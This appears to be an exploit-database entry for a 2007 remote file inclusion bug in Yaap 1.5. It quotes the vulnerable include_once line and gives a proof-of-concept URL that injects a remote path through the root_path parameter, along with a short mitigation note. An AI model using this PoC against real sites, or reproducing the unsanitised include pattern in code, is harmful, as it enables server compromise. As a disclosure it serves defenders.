header-logo
Suggest Exploit
vendor:
by:
3l3ctric-Cracker (Dr Max Virus)
5.5
CVSS
MEDIUM
Bug
CWE
Product Name:
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Yaap

The Yaap script is affected by a bug in the common.php file, specifically in the include_once function call. This vulnerability allows an attacker to execute arbitrary shell code by manipulating the 'root_path' parameter in the URL.

Mitigation:

The vendor should release a patch to fix the bug and validate user input properly to prevent arbitrary code execution.
Source

Exploit-DB raw data:

--------------------------------------------------------------------------------
Script name.......:Yaap
Affected Version.....:1.5
D.page..:http://yaap.oskbraniewo.pl/download/yaap_15.tar.gz
--------------------------------------------------------------------------------
Author:3l3ctric-Cracker  (Dr Max Virus) :D
Contact:drmaxvirus@w.cn
--------------------------------------------------------------------------------
Bug in:\public_html\includes\common.php
Vul Code:
include_once($root_path.'/classes/'.$class_name.'.php');
----------------------------------------------------------------------------------
POC:
http:[target]/[path]/includes/common.php?root_path=ShellCode
-----------------------------------------------------------------------------------

# milw0rm.com [2007-05-12]